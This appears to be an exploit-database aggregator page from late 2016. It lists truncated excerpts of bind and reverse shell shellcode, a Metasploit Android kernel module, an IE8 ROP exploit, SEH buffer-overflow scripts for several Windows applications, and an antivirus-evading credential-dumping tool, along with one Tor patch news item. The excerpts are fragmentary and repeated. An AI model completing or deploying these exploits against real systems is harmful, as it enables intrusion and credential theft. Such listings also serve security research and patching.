Exploit the Credentials Present in Files and Memory: PowerMemory

PowerMemory is a PowerShell post-exploitation tool. It uses Microsoft binaries and therefore is able to execute on a machine, even after the Device Guard Policies have been set. In the same way, it will bypass antivirus detection. PowerMemory can retrieve credentials information and manipulate...

Windows x64 - Password Protected Bind Shellcode (825 bytes)

Windows x64 - Password Protected Bind Shellcode 825 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 Password Protected Bind Shell TCP shellcode size : 825 bytes Author : Roziul Hasan Khan Shifat Tested On : Windows 7 x64 professional Date : 01-01-2017 / / file format pe-x86-...

Windows/x64 - Password Protected Bind Shellcode (825 bytes)

/ Title : Windows x64 Password Protected Bind Shell TCP shellcode size : 825 bytes Author : Roziul Hasan Khan Shifat Tested On : Windows 7 x64 professional Date : 01-01-2017 / / file format pe-x86-64 Disassembly of section .text: 0000000000000000 : 0: 99 cltd 1: b2 80 mov $0x80,%dl 3: 48 29 d4 su...

Google Android - get_user/put_user (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class MetasploitModule "Android getuser/putuser Exploit", 'Description' = %q This module exploits a missing check in the getuser and...

Android get_user/put_user Exploit

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'rex' class MetasploitModule "Android getuser/putuser Exploit", 'Description' = %q This module exploits a missing check in the getuser and...

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

/ ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic 147precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ;72 bytes ;description: executes arbitrary command...

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode 72 bytes. Shellcode exploit for Linx86 platform / ;author: Filippo "zinzloun" Bersani ;date: 16/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic...

In ie8 using ROP and Heap Spray using the bounce of the shell-vulnerability warning-the black bar safety net

This exploit program is for the Windows 7 platform on the IE8 browser. The focus of our attention is one that uses the Java network launch Protocol JNLP the plug-in, this plug-in there is overflow vulnerability. In order to achieve the use, I will use the Heaplib to construct a ROP chain in order...

Android get_user/put_user Exploit

This module exploits a missing check in the getuser and putuser API functions in the linux kernel before 3.5.5. The missing checks on these functions allow an unprivileged user to read and write kernel memory. This exploit first reads the kernel memory to identify the commitcreds and ptmxfops...

10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow Exploit

Exploit for windows platform in category local exploits !python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download:...

10-Strike Network File Search Pro 2.3 Buffer Overflow

!python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe Tested on: Win7 SP1 Author:...

10-Strike Network File Search Pro 2.3 - Local Buffer Overflow (SEH)

10-Strike Network File Search Pro 2.3 - Local Buffer Overflow SEH !python Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit Date: 2016-12-10 Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml Download:...

Windows/x64 - Bind Shell TCP Shellcode (508 bytes)

/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...

Windows x64 - Bind Shell TCP Shellcode (508 bytes)

Windows x64 - Bind Shell TCP Shellcode 508 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx m...

Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)

/ ;author: Filippo "zinzloun" Bersani ;date: 05/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic 147precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ; description: get a reverse shell executing a shell...

Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)

Linux/x86 - Netcat -e option disabled Reverse Shell Shellcode 180 bytes. Shellcode exploit for Linx86 platform / ;author: Filippo "zinzloun" Bersani ;date: 05/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic...

Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow

Disk Savvy Enterprise 9.1.14 - GET Remote Buffer Overflow !/usr/bin/python import socket,os,time SEH Stack Overflow in GET request Disk Savvy Enterprise 9.1.14 Tested on Windows XP SP3 && Windows 7 Professional host = "192.168.1.20" port = 80 badchars \x00\x09\x0a\x0d\x20 msfvenom -a x86 --platfo...

Tor Patched Against Zero Day Under Attack

Update The Tor Project has provided a browser update that patches a zero-day vulnerability being exploited in the wild to de-anonymize Tor users. “The security flaw responsible for this urgent release is already actively exploited on Windows systems. Even though there is currently, to the best of...

Disk Pulse Enterprise 9.1.16 Buffer Overflow

!/usr/bin/python print "Disk Pulse Enterprise 9.1.16 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT AUTHORITY\SYSTEM You do not need to be authenticated, password below is...

Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow

Disk Sorter Enterprise 9.1.12 - Login Remote Buffer Overflow !/usr/bin/python print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Exploit will land you NT...